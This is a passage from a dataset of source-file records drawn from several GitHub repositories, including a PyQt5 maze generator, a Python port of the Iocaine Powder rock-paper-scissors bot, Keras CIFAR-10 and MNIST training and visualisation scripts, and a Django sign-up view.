PyQt5.QtCore.QFileInfo(__file__).absolutePath()\n\n self.new_maze = QAction(QIcon(root + '/images/new.png'), \"&Create Maze\", self,\n shortcut=QKeySequence.New, statusTip=\"Start Maze Creation\",\n triggered=self.create_maze)\n\n self.save_as_action = QAction(QIcon(root + '/images/save.png'), \"Save &As...\", self,\n shortcut=QKeySequence.SaveAs,\n statusTip=\"Save the document under a new name\",\n triggered=self.save_as)\n\n self.exit_action = QAction(QIcon(root + '/images/exit.png'), \"&Exit\", self, shortcut=\"Ctrl+Q\",\n statusTip=\"Exit the application\", triggered=self.close)\n\n self.about_action = QAction(QIcon(root + '/images/about.png'), \"&About\", self,\n statusTip=\"Show the application's About box\",\n triggered=self.about)\n\n def create_tool_bars(self):\n self.create_bar = self.addToolBar(\"Create Maze\")\n self.create_bar.addAction(self.new_maze)\n self.create_bar.addAction(self.save_as_action)\n\n self.about_bar = self.addToolBar(\"About\")\n self.about_bar.addAction(self.exit_action)\n self.about_bar.addAction(self.about_action)\n\n def paintEvent(self, e):\n print(\"paint EVEnT >>>>>>>>>>>>\")\n if self.mModified:\n self.mModified = False\n\n painter = QPainter(self)\n painter.setPen(QPen(Qt.black, 1, Qt.SolidLine))\n\n if not self.grid_painted:\n for cell_list in self.grid:\n for cell in cell_list:\n cell.init_grid(painter, self.w)\n # self.grid_painted = True\n\n self.draw_path(painter)\n self.sent_painter(painter)\n painter.end()\n\n def sent_painter(self, qp):\n func, kwargs = self.func\n if func is not None:\n kwargs[\"painter\"] = qp\n func(**kwargs)\n\n def create_maze(self, painter):\n while len(self.back_tracker) > 0:\n # for i in range(1):\n if len(self.back_tracker) > 0:\n c_cell = self.back_tracker.pop()\n self.current = c_cell\n print(\"Current {0}\".format(c_cell))\n c_cell.visited = True\n self.path.append(c_cell)\n c_cell.draw_mark(painter, self.w)\n c_cell.check_neighbours(self.grid)\n not_visited_cells = [visited_cell for visited_cell in c_cell.neighbours if not visited_cell.visited]\n\n if len(not_visited_cells) > 0:\n # print(\"Pushing {0}\".format(self.current))\n self.back_tracker.append(self.current)\n # verify the neighbours that have not been visited\n len_n = len(not_visited_cells)\n if len_n > 1:\n random_index = random.randrange(0, len_n)\n else:\n random_index = 0\n\n n_cell = not_visited_cells[random_index]\n n_cell.visited = True\n # print(\"Pushing {0}\".format(n_cell))\n self.remove_walls(self.current, n_cell)\n self.back_tracker.append(n_cell)\n else:\n print(\"Finisehd.........\")\n for x in range(len(self.grid)):\n for y in range(len(self.grid[x])):\n c = self.grid[x][y]\n print('Cell ({0},{1}), visited= {2}'.format(c.row, c.col, c.visited))\n\n def draw_path(self, painter):\n for cell in self.path:\n painter.setPen(Qt.NoPen)\n # painter.setBrush(QBrush(Qt.darkGreen, Qt.SolidPattern))\n painter.setBrush(Qt.NoBrush)\n painter.drawRect(cell.col * self.w, cell.row * self.w, self.w, self.w)\n\n def remove_walls(self, current_cell, next_cell):\n pos_current = current_cell.col + self.columns * current_cell.row\n pos_next = next_cell.col + self.columns * next_cell.row\n\n # we are in the same row so subtracts cols\n if current_cell.row == next_cell.row:\n relative_col_pos = current_cell.col - next_cell.col\n if relative_col_pos == 1:\n current_cell.walls[\"left\"] = None\n next_cell.walls[\"right\"] = None\n elif relative_col_pos == -1:\n current_cell.walls[\"right\"] = None\n next_cell.walls[\"left\"] = None\n elif current_cell.col == next_cell.col:\n relative_row_pos = current_cell.row - next_cell.row\n if relative_row_pos == 1:\n current_cell.walls[\"top\"] = None\n next_cell.walls[\"bottom\"] = None\n elif relative_row_pos == -1:\n current_cell.walls[\"bottom\"] = None\n next_cell.walls[\"top\"] = None\n\n def save_as(self):\n print(\"to be implemented\")\n\n def about(self):\n QMessageBox.about(self, \"About Application\",\n \"The <b>Application</b> Maze Creation.\")\n\n def keyPressEvent(self, event):\n gey = event.key()\n self.func = (None, None)\n if gey == Qt.Key_M:\n print(\"Key 'm' pressed!\")\n elif gey == Qt.Key_Right:\n print(\"Right key pressed!, call drawFundBlock()\")\n self.func = (self.create_maze, {})\n self.mModified = True\n self.update()\n elif gey == Qt.Key_5:\n print(\"#5 pressed, call drawNumber()\")\n self.func = (self.drawNumber, {\"notePoint\": QPoint(100, 100)})\n self.mModified = True\n self.update()\n\n def __create_2d_array(self, rows, cols):\n return [[0] * cols for i in range(rows)]\n\n\nif __name__ == '__main__':\n import sys\n app = QApplication(sys.argv)\n maze_generator = MazeGenerator()\n sys.exit(app.exec_())\n" }, { "alpha_fraction": 0.5124846696853638, "alphanum_fraction": 0.5407286286354065, "avg_line_length": 27.74117660522461, "blob_id": "83892b65c6f68626b227a0a96142ac24312cb390", "content_id": "429ed9ac7181324b433e8695091c4b266d55c966", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2443, "license_type": "no_license", "max_line_length": 74, "num_lines": 85, "path": "/ui/example_repaint.py", "repo_name": "darklatiz/writter-notebook", "src_encoding": "UTF-8", "text": "import sys\n\nfrom PyQt5.QtCore import QRect, Qt, QPoint\nfrom PyQt5.QtGui import QPixmap, QPainter, QPen, QFont\nfrom PyQt5.QtWidgets import QWidget, QApplication\n\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n self.mModified = True\n self.initUI()\n self.currentRegion = QRect(50, 50, 50, 80)\n self.x0 = 5\n self.x1 = 25\n self.y0 = 5\n self.y1 = 25\n self.mPixmap = QPixmap()\n self.func = (None, None)\n\n def initUI(self):\n self.setGeometry(300, 300, 280, 270)\n self.setWindowTitle('Painter training')\n self.show()\n\n def paintEvent(self, event):\n if self.mModified:\n pixmap = QPixmap(self.size())\n pixmap.fill(Qt.white)\n painter = QPainter(pixmap)\n painter.drawPixmap(0, 0, self.mPixmap)\n self.drawBackground(painter)\n self.mPixmap = pixmap\n self.mModified = False\n\n qp = QPainter(self)\n qp.drawPixmap(0, 0, self.mPixmap)\n\n def drawBackground(self, qp):\n func, kwargs = self.func\n if func is not None:\n kwargs[\"qp\"] = qp\n func(**kwargs)\n\n def drawFundBlock(self, qp):\n pen = QPen(Qt.black, 2, Qt.SolidLine)\n pen.setStyle(Qt.DashLine)\n\n qp.setPen(pen)\n for i in range(1, 10):\n qp.drawLine(self.x0, i * self.y0, self.x1, self.y0 * i)\n\n def drawNumber(self, qp, notePoint):\n pen = QPen(Qt.black, 2, Qt.SolidLine)\n qp.setPen(pen)\n qp.setFont(QFont('Arial', 10))\n qp.drawText(notePoint, \"5\")\n\n def nextRegion(self):\n self.x0 += 30\n self.x1 += 30\n self.y0 += 30\n self.y1 += 30\n\n def keyPressEvent(self, event):\n gey = event.key()\n self.func = (None, None)\n if gey == Qt.Key_M:\n print(\"Key 'm' pressed!\")\n elif gey == Qt.Key_Right:\n print(\"Right key pressed!, call drawFundBlock()\")\n self.func = (self.drawFundBlock, {})\n self.mModified = True\n self.update()\n self.nextRegion()\n elif gey == Qt.Key_5:\n print(\"#5 pressed, call drawNumber()\")\n self.func = (self.drawNumber, {\"notePoint\": QPoint(100, 100)})\n self.mModified = True\n self.update()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())\n" }, { "alpha_fraction": 0.5191534757614136, "alphanum_fraction": 0.5253147482872009, "avg_line_length": 32.035396575927734, "blob_id": "4fd775cadbd3abae18669fb3c6f6ebc877677425", "content_id": "d2bbf085bcfc117779e16e668617b51366b7d72a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3733, "license_type": "no_license", "max_line_length": 85, "num_lines": 113, "path": "/things/Cell.py", "repo_name": "darklatiz/writter-notebook", "src_encoding": "UTF-8", "text": "from builtins import IndexError\n\nfrom PyQt5.QtCore import Qt, QLine\nfrom PyQt5.QtGui import QBrush\nimport random\n\n\nclass Cell:\n\n def __init__(self, row, col):\n self.row = row\n self.col = col\n self.visited = False\n self.loaded_neighbours = False\n self.neighbours = []\n self.walls_created = False\n self.walls = {\n \"left\": None,\n \"right\": None,\n \"top\": None,\n \"bottom\": None\n }\n\n def init_grid(self, painter, w):\n x = self.col * w\n y = self.row * w\n\n # refactoring have a boolean variable once we have loaded all the walls\n # I am going to invert the axis\n if not self.walls_created:\n # top\n line_top = QLine(x, y, x + w, y)\n painter.drawLine(line_top)\n self.walls[\"top\"] = line_top\n\n # right\n line_right = QLine(x + w, y, x + w, y + w)\n painter.drawLine(line_right)\n self.walls[\"right\"] = line_right\n\n # bottom\n line_bottom = QLine(x + w, y + w, x, y + w)\n painter.drawLine(line_bottom)\n self.walls[\"bottom\"] = line_bottom\n\n # left\n line_left = QLine(x, y + w, x, y)\n painter.drawLine(line_left)\n self.walls[\"left\"] = line_left\n self.walls_created = True\n # print(\"{0} walls have been created\".format(self))\n else:\n # print(\"Walls repainted from data stored in array\")\n if self.walls[\"top\"] is not None:\n painter.drawLine(self.walls[\"top\"])\n\n if self.walls[\"right\"] is not None:\n painter.drawLine(self.walls[\"right\"])\n\n if self.walls[\"bottom\"] is not None:\n painter.drawLine(self.walls[\"bottom\"])\n\n if self.walls[\"left\"] is not None:\n painter.drawLine(self.walls[\"left\"])\n\n def draw_mark(self, painter, w):\n # print(\"Pintando MAgenta SQuare ({0},{1})\".format(self.row, self.col))\n if self.visited:\n painter.setPen(Qt.NoPen)\n # painter.setBrush(QBrush(Qt.darkMagenta, Qt.SolidPattern))\n painter.setBrush(QBrush(Qt.darkMagenta, Qt.SolidPattern))\n painter.setBrush(Qt.NoBrush)\n painter.drawRect(self.col * w, self.row * w, w, w)\n\n def check_neighbours(self, the_grid):\n if not self.loaded_neighbours:\n self.get_neighbours_from_grid(the_grid)\n\n def get_neighbours_from_grid(self, the_grid):\n try:\n # top\n c = the_grid[self.row][self.col - 1]\n if not c.visited:\n self.neighbours.append(c)\n except IndexError as indexerr:\n print(\"Neighbour not found cell({0},{1})\".format(self.row, self.col - 1))\n\n try:\n # right\n c = the_grid[self.row + 1][self.col]\n if not c.visited:\n self.neighbours.append(c)\n except IndexError as indexerr:\n print(\"Neighbour not found cell({0},{1})\".format(self.row + 1, self.col))\n\n try:\n # bottom\n c = the_grid[self.row][self.col + 1]\n if not c.visited:\n self.neighbours.append(c)\n except IndexError as indexerr:\n print(\"Neighbour not found cell({0},{1})\".format(self.row, self.col + 1))\n\n try:\n # left\n c = the_grid[self.row - 1][self.col]\n if not c.visited:\n self.neighbours.append(c)\n except IndexError as indexerr:\n print(\"Neighbour not found cell({0},{1})\".format(self.row - 1, self.col))\n\n def __str__(self):\n return \"Cell({0},{1})\".format(self.row, self.col)\n" }, { "alpha_fraction": 0.7254902124404907, "alphanum_fraction": 0.7450980544090271, "avg_line_length": 11.75, "blob_id": "a288ff7219014b71aa268588a4354e375c10306f", "content_id": "de98ac65a7017b51f9defe3328bc6cffc3911a08", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 51, "license_type": "no_license", "max_line_length": 18, "num_lines": 4, "path": "/README.md", "repo_name": "darklatiz/writter-notebook", "src_encoding": "UTF-8", "text": "# GUI Python\n\n## Installing PyQT\npip install PyQt5\n" } ]
4
snu-stat/dnn-cs-posco
https://github.com/snu-stat/dnn-cs-posco
a9a85e4a350455fa82fa28cbdb8f51f01b1482df
b759bcc88c3705a0935261afb932fee672e42243
9aefe6b50f71139496c4453bd16a8bb7b7bb39c4
refs/heads/master
2021-01-15T11:25:21.267059
2016-10-03T10:39:54
2016-10-03T10:39:54
48,526,342
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6534653306007385, "alphanum_fraction": 0.6806930899620056, "avg_line_length": 27.785715103149414, "blob_id": "8f6e20f37f1e66f312cee56ebf41af774af39256", "content_id": "31ad1837d83633937efaba4fe7008148ab699564", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "no_license", "max_line_length": 68, "num_lines": 14, "path": "/data_png2.py", "repo_name": "snu-stat/dnn-cs-posco", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\n\nimg = mpimg.imread('lena_color.png')\nprint('img shape', img.shape)\nplt.imshow(img)\nplt.show()\n\nimg = img.transpose(2, 0, 1)\nimg = img.reshape(1, 3, 512, 512)\nprint('type=',type(img), ', shape=', img.shape, ', ndim=', img.ndim)\nprint('data type=', img.dtype.name)\nprint('item size=', img.itemsize, ', size=', img.size)\n\n" }, { "alpha_fraction": 0.7015674114227295, "alphanum_fraction": 0.7115987539291382, "avg_line_length": 57.925926208496094, "blob_id": "839571cdd851a83b30e52566b09a5e27f7f81070", "content_id": "0535c350445cd41c25acf612a11bca7dfcb71aea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2339, "license_type": "no_license", "max_line_length": 159, "num_lines": 27, "path": "/README.md", "repo_name": "snu-stat/dnn-cs-posco", "src_encoding": "UTF-8", "text": "# 인공 신경망과 딥 러닝 강의 실습 코드\n* [Keras library](http://keras.io)를 이용한 딥 뉴럴 네트워크 실습 코드입니다.\n* 해당 코드를 이용해 실습을 진행하기 위해서는 [Python 2.7](https://www.python.org/), [Theano](http://deeplearning.net/software/theano/#), [Keras library](http://keras.io)가 필요합니다.\n\n## 코드 구성\n* [mnist_shallow.py](https://github.com/snu-stat/dnn-cs/blob/master/mnist_shallow.py)\n + MNIST 데이터의 구분을 위한 얕은 네트워크(shallow network)를 구성해 훈련하고, 훈련을 마친 네트워크의 정확도를 확인하는 코드\n* [mnist_deep.py](https://github.com/snu-stat/dnn-cs/blob/master/mnist_deep.py)\n + MNIST 데이터의 구분을 위한 깊은 네트워크(deep network)를 구성해 훈련하고, 훈련을 마친 네트워크의 정확도를 확인하는 코드\n* [mnist_cnn.py](https://github.com/snu-stat/dnn-cs/blob/master/mnist_cnn.py)\n + CNN(Convolutional Neural Network) 네트워크 구조를 더 쌓아 구성한 deep Convolutional Network를 이용해 MNIST 데이터를 훈련하고, 훈련을 마친 네트워크의 정확도를 확인하는 코드 \n* [cifar10_cnn.py](https://github.com/snu-stat/dnn-cs/blob/master/cifar10_cnn.py)\n + CNN 네트워크 구조를 이용해 CIFAR-10 데이터를 훈련하고, 훈련을 마친 네트워크의 정확도를 확인하는 코드\n + Model, weight, history를 저장\n* [test_mnist_cnn.py](https://github.com/snu-stat/dnn-cs/blob/master/test_mnist_cnn.py)\n + MNIST 데이터를 이용해 훈련된 네트워크를 불러와, model, history, 각 층의 결과를 확인하는 코드\n* [test_cifar10_cnn.py](https://github.com/snu-stat/dnn-cs/blob/master/test_cifar10_cnn.py)\n + CIFAR-10 데이터를 이용해 훈련된 네트워크를 불러와, model, history, 각 층의 결과를 확인하는 코드\n\n## GPU 사용\n* GPU 사용이 가능한 컴퓨터의 경우, Theano에서 제공하는 GPU 병렬화 기능을 사용하기 위해서는 Theano flag를 GPU 계산을 위해 셋팅해야 함.\n + 예를 들어 mnist_shallow.py 프로그램을 GPU에서 실행시키려 할 경우, Command-line Prompt에 다음과 같이 입력해 코드를 실행 \n\n```\n> THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32\n> python mnist_shallow.py\n``` \n" }, { "alpha_fraction": 0.6362888216972351, "alphanum_fraction": 0.6745525598526001, "avg_line_length": 38.19355010986328, "blob_id": "8c11211aa22e9817053806c99cf9f041eb466d64", "content_id": "784dbef90a7cf25a1669b945982528c009fb51fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4861, "license_type": "no_license", "max_line_length": 120, "num_lines": 124, "path": "/test_cifar10_cnn.py", "repo_name": "snu-stat/dnn-cs-posco", "src_encoding": "UTF-8", "text": "from __future__ import print_function\n\nfrom keras.datasets import cifar10 \nfrom keras.models import Sequential\n\nfrom keras.models import model_from_json\nfrom keras import backend as K\nimport matplotlib.pyplot as plt\nimport theano\nimport json\n\nbatch_size = 128\nnb_classes = 10\nnb_epoch = 20\n# input image dimensions\nimg_rows, img_cols = 32, 32\n# the CIFAR10 images are RGB\nimg_channels = 3\n\n# the data, shuffled and split between tran and test sets\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\nif K.image_dim_ordering() == 'th':\n X_test = X_test.reshape(X_test.shape[0], img_channels, img_rows, img_cols)\n input_shape = (img_channels, img_rows, img_cols)\nelse:\n X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, img_channels)\n input_shape = (img_rows, img_cols, img_channels)\nX_test = X_test.astype('float32')\nX_test /= 255\nprint(X_test.shape[0], 'test samples')\n\n# Reconstruct model\nmodel = model_from_json(open('cifar10_model_architecture.json').read())\nmodel.load_weights('cifar10_model_weights.h5')\n\n# Plot history \nhist = json.loads(open('cifar10_model_history.json').read())\n\nplt.figure('history')\nplt.subplot(211)\nplt.title('Loss over epochs')\nplt.plot(hist['loss'],'r',label='loss')\nplt.plot(hist['val_loss'], 'b',label='val_loss')\nplt.xlabel('Epochs')\nplt.ylabel('Loss')\n\nplt.subplot(212)\nplt.title('Accuracy over epochs')\nplt.plot(hist['acc'],'r',label='acc')\nplt.plot(hist['val_acc'], 'b',label='val_acc')\nplt.xlabel('Epochs')\nplt.ylabel('Accuracy')\n\nplt.tight_layout()\nplt.show()\n\n# Get output of each layer\nget_1st_layer_output = K.function([model.layers[0].input, K.learning_phase()], [model.layers[0].output])\nget_2nd_layer_output = K.function([model.layers[0].input, K.learning_phase()], [model.layers[2].output])\nget_3rd_layer_output = K.function([model.layers[0].input, K.learning_phase()], [model.layers[7].output])\nget_last_layer_output = K.function([model.layers[0].input, K.learning_phase()], [model.layers[10].output])\nprint('X_test image shape:', X_test.shape)\nlayer_1_output = get_1st_layer_output([X_test,0])[0]\nprint('Print 1st layer output', layer_1_output.shape)\nlayer_2_output = get_2nd_layer_output([X_test,0])[0]\nprint('Print 2nd layer output', layer_2_output.shape)\nlayer_3_output = get_3rd_layer_output([X_test,0])[0]\nprint('Print 3rd layer output', layer_3_output.shape)\nlayer_last_output = get_last_layer_output([X_test,0])[0]\nprint('Print last layer output', layer_last_output.shape)\n\n# Predict classes and probability\nprint('Predict classes')\nclasses = model.predict_classes(X_test, batch_size)\nprint('Predict probability')\nproba = model.predict_proba(X_test, batch_size)\n\n# Plot output of each layer\ndef plotvalue(index):\n plt.figure('Input data and 1~4 layer output value of X_test[{idx}]'.format(idx=index), figsize=(12,9), dpi=100)\n plt.subplot2grid((5,8),(0,0),rowspan=2,colspan=2)\n plt.title('Input data')\n plt.imshow(X_test[index].transpose(1,2,0))\n\n plt.subplot2grid((5,8),(0,2))\n plt.imshow(layer_1_output[index][0], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(0,3))\n plt.imshow(layer_1_output[index][1], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(0,4))\n plt.imshow(layer_1_output[index][2], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(1,2))\n plt.imshow(layer_1_output[index][3], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(1,3))\n plt.imshow(layer_1_output[index][4], cmap='bone', interpolation='nearest')\n\n plt.subplot2grid((5,8),(0,5))\n plt.imshow(layer_2_output[index][0], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(0,6))\n plt.imshow(layer_2_output[index][1], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(0,7))\n plt.imshow(layer_2_output[index][2], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(1,5))\n plt.imshow(layer_2_output[index][3], cmap='bone', interpolation='nearest')\n plt.subplot2grid((5,8),(1,6))\n plt.imshow(layer_2_output[index][4], cmap='bone', interpolation='nearest')\n\n plt.subplot2grid((5,8),(2,0),colspan=8)\n plt.imshow(layer_3_output[index].reshape(1,layer_3_output.shape[1]), cmap='bone', interpolation='nearest')\n\n plt.subplot2grid((5,8),(3,0),colspan=8)\n plt.title('probability prediction')\n plt.plot(proba[index],'r',label='probability')\n\n plt.subplot2grid((5,8),(4,0),colspan=8)\n plt.title('Last layer output={ans}, y_test={sol}'.format(ans=classes[index],sol=y_test[index]))\n plt.imshow(layer_last_output[index].reshape(1,layer_last_output.shape[1]), cmap='bone', interpolation='nearest')\n\n plt.tight_layout()\n plt.show()\n\n# Plot test data\nplotvalue(0)\nplotvalue(1)\nplotvalue(2)\n\n" }, { "alpha_fraction": 0.6112040281295776, "alphanum_fraction": 0.6354514956474304, "avg_line_length": 28.170732498168945, "blob_id": "b0e9fd7c08a828f2f3522b5a0836a2fe6ff94b72", "content_id": "a160c9724390b1d31d262170a906605d3796520e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1196, "license_type": "no_license", "max_line_length": 75, "num_lines": 41, "path": "/data_numpy.py", "repo_name": "snu-stat/dnn-cs-posco", "src_encoding": "UTF-8", "text": "from keras.utils import np_utils\nimport numpy as np\n\na = np.array([0,0,1,1,2,2,1,1,3,3,0,0])\nb = np.array([(0,1,2),(1,3,0)])\n\nprint('a')\nprint('type=',type(a), ', shape=', a.shape, ', ndim=', a.ndim)\nprint('data type=', a.dtype.name)\nprint('item size=', a.itemsize, ', size=', a.size)\n\nprint('b')\nprint('type=',type(b), ', shape=', b.shape, ', ndim=', b.ndim)\nprint('data type=', b.dtype.name)\nprint('item size=', b.itemsize, ', size=', b.size)\n\na = a.reshape(6,2)\nb = b.reshape(6)\n\na = a.astype('float32')\nc = np_utils.to_categorical(b, 4)\n\nprint('a')\nprint('type=',type(a), ', shape=', a.shape, ', ndim=', a.ndim)\nprint('data type=', a.dtype.name)\nprint('item size=', a.itemsize, ', size=', a.size)\n\nprint('c')\nprint('type=',type(c), ', shape=', c.shape, ', ndim=', c.ndim)\nprint('data type=', c.dtype.name)\nprint('item size=', c.itemsize, ', size=', c.size)\n\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Activation\nfrom keras.optimizers import SGD\n\nmodel = Sequential()\nmodel.add(Dense(4, init='uniform', input_shape=(2,), activation='softmax'))\nmodel.compile(loss='mse', optimizer='sgd', metrics=['accuracy'])\n\nmodel.fit(a, c, batch_size=1, nb_epoch=3, verbose=1)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6878306865692139, "avg_line_length": 28.076923370361328, "blob_id": "c0b1fa16dd6f0c7fd88c984a4bc0bee006adf8ed", "content_id": "ffaa7586b66e844c5030af1e0d29f746ee7babbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 378, "license_type": "no_license", "max_line_length": 68, "num_lines": 13, "path": "/data_png.py", "repo_name": "snu-stat/dnn-cs-posco", "src_encoding": "UTF-8", "text": "import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\n\nimg = mpimg.imread('lena.png')\nprint('img shape', img.shape)\nplt.imshow(img, cmap='bone')\nplt.show()\n\nimg = img.reshape(1,1,512,512)\nprint('type=',type(img), ', shape=', img.shape, ', ndim=', img.ndim)\nprint('data type=', img.dtype.name)\nprint('item size=', img.itemsize, ', size=', img.size)\n" } ]
5
erdman/roshambo
https://github.com/erdman/roshambo
edff799085b93a5c476142f4cc57ed73e0ac478d
c8f174151634544e5aa18698f8b9b6306d1b424f
55cc3551b486836b1565ba80101a09af092320b6
refs/heads/master
2021-01-22T04:40:26.072847
2012-07-28T23:10:21
2012-07-28T23:10:21
5,187,176
9
0
null
null
null
null
null
[ { "alpha_fraction": 0.520636260509491, "alphanum_fraction": 0.5361135005950928, "avg_line_length": 37.75, "blob_id": "fefab95c9a556662001cf8578495f35a053be59f", "content_id": "374e2f12ace769fde14f2903c4113e60ab3ccb2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4652, "license_type": "no_license", "max_line_length": 139, "num_lines": 120, "path": "/iocaine.py", "repo_name": "erdman/roshambo", "src_encoding": "UTF-8", "text": "# python translation of Dan Egnor's Iocaine Powder\n# http://ofb.net/~egnor/iocaine.html\n\ndef player(my_moves, opp_moves):\n import random\n from itertools import izip\n rps_to_text = ('rock','paper','scissors')\n rps_to_num = {'rock':0, 'paper':1, 'scissors':2}\n superior = (1,2,0)\n inferior = (2,0,1)\n\n ages = (1000,100,10,5,2,1)\n guess = random.choice([0,1,2])\n\n TRIALS = 1000\n\n def match_single(i,moves):\n j = 0\n for high,low in izip(reversed(moves),reversed(moves[:i])):\n if high == low and j < i:\n j += 1\n else:\n return j\n\n def match_both(i):\n j = 0\n for my_high,my_low,opp_high,opp_low in izip(reversed(my_moves),reversed(my_moves[:i]),reversed(opp_moves),reversed(opp_moves[:i])):\n if my_high == my_low and opp_high == opp_low and j < i:\n j+= 1\n else:\n return j\n\n def match_history(age,moves=None):\n best = 0\n best_length = 0 # was None, but logic breaks bc 0 > None in j > best_length test below\n num = len(my_moves) # the number of trials completed\n last_move_index = num - 1\n if num:\n i = last_move_index - 1 # start reverse loop at 2nd last move\n j = None\n while i > last_move_index - age and i > best_length and j <= num/2:\n j = match_both(i) if moves is None else match_single(i,moves)\n if j > best_length:\n best_length = j\n best = i #this is going to be used as index,but here it is slice endpoint, so don't need to +1\n i -= 1\n return best\n\n class stats:\n counts = [[0,0,0]]\n def add(self,i,delta):\n self.counts[-1][i] += delta\n def next(self):\n self.counts.append(self.counts[-1][:])\n def max(self,age,score):\n which = None\n if age >= len(self.counts):\n diff, i = max((c,i) for i,c in enumerate(self.counts[-1]))\n else:\n diff, i = max((c-d,i) for i,(c,d) in enumerate(izip(self.counts[-1], self.counts[-1 - age])))\n if diff > score:\n score = diff\n which = i\n return which, score\n\n class predict:\n st = stats()\n last = None\n def do_predict(self,move):\n if self.last is not None: #opp_moves:\n diff = (3 + rps_to_num[opp_moves[-1]] - self.last) % 3\n self.st.add(superior[diff], 1)\n self.st.add(inferior[diff], -1)\n self.st.next()\n self.last = move\n def scan_predict(self,age,move,score):\n which, score = self.st.max(age,score)\n new_move = move if which is None else ((self.last + which) % 3)\n return new_move, score\n\n # begin logic\n\n if not my_moves:\n player.pr_history = [[[predict() for k in xrange(2)] for j in xrange(3)] for _ in ages]\n player.pr_freq = [[predict() for k in xrange(2)] for _ in ages]\n player.pr_fixed = predict()\n player.pr_random = predict()\n player.pr_meta = [predict() for _ in ages]\n player.statz = [stats(),stats()]\n else:\n player.statz[0].add(rps_to_num[my_moves[-1]],1)\n player.statz[1].add(rps_to_num[opp_moves[-1]],1)\n\n for a,age in enumerate(ages):\n best = [match_history(age,my_moves), match_history(age,opp_moves), match_history(age,None)]\n for w,b in enumerate(best):\n player.pr_history[a][w][0].do_predict(guess if b==0 else rps_to_num[my_moves[b]])\n player.pr_history[a][w][1].do_predict(guess if b==0 else rps_to_num[opp_moves[b]])\n for p in xrange(2):\n which, _ = player.statz[p].max(age,None)\n player.pr_freq[a][p].do_predict(which if which is not None else guess)\n\n player.pr_random.do_predict(guess)\n player.pr_fixed.do_predict(0)\n\n for a,age in enumerate(ages):\n move = score = None\n for aa, _ in enumerate(ages):\n for p in xrange(2):\n for w in xrange(3):\n move, score = player.pr_history[aa][w][p].scan_predict(age, move, score)\n move, score = player.pr_freq[aa][p].scan_predict(age, move, score)\n move, score = player.pr_random.scan_predict(age, move, score)\n move, score = player.pr_fixed.scan_predict(age, move, score)\n player.pr_meta[a].do_predict(move)\n\n move = score = None\n for meta in player.pr_meta:\n move, score = meta.scan_predict(TRIALS, move, score) #REVIEW\n return rps_to_text[move]\n\n\n" }, { "alpha_fraction": 0.7730769515037537, "alphanum_fraction": 0.7730769515037537, "avg_line_length": 42.33333206176758, "blob_id": "b9f0a9ce21ae9b684c609c00f4d9ea1c62177e78", "content_id": "27b7b8bbfea6efccfe520aa71645f65e0dd1bca1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 260, "license_type": "no_license", "max_line_length": 146, "num_lines": 6, "path": "/README.md", "repo_name": "erdman/roshambo", "src_encoding": "UTF-8", "text": "roshambo\n========\n\nRoshambo bots including Python translations of Dan Egnor's Iocaine Powder and Andrzej Nagorko's Greenberg.\n\nThe Greenberg bot appears to be complete and functional, but Iocaine Powder still has a bug somewhere. Pull requests accepted if you can find it.\n" } ]
2
carlcastello/BabySittingApp
https://github.com/carlcastello/BabySittingApp
e8ac56ed08dcef988f663dd3d44b2ef319c1f908
6538086bc6eb0ad1e47be429f04008541468ea79
f7032664cdfb3fd0efd3c8ef72ad20ef9f1d855f
refs/heads/master
2021-08-09T01:26:46.090299
2017-11-11T19:38:26
2017-11-11T19:38:26
106,501,481
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7201166152954102, "alphanum_fraction": 0.7201166152954102, "avg_line_length": 30.090909957885742, "blob_id": "1f7bc806d60ac00af0b09891a3dd16677b81a677", "content_id": "525b3dcc56b3e1a667898d68837bc82603ff08d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 343, "license_type": "no_license", "max_line_length": 66, "num_lines": 11, "path": "/customer_portal_project/customer_portal/views/Authentication.py", "repo_name": "carlcastello/BabySittingApp", "src_encoding": "UTF-8", "text": "\nfrom django.views import View\nfrom django.shortcuts import render\nfrom customer_portal.form.UserCreationForm import UserCreationForm\n\n\nclass SignUp(View):\n template_name = \"auth/sign_up.html\"\n\n def get(self, request, *args, **kwargs):\n form = UserCreationForm()\n return render(request, self.template_name, {'form': form})\n" }, { "alpha_fraction": 0.4129098355770111, "alphanum_fraction": 0.4308401644229889, "avg_line_length": 26.885713577270508, "blob_id": "152066f2504e22d9637fcdb99132f8e2e29bf758", "content_id": "cb0c313c7abbd5ee4dca57189f3a023731c732b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3904, "license_type": "no_license", "max_line_length": 105, "num_lines": 140, "path": "/customer_portal_project/customer_portal/form/UserCreationForm.py", 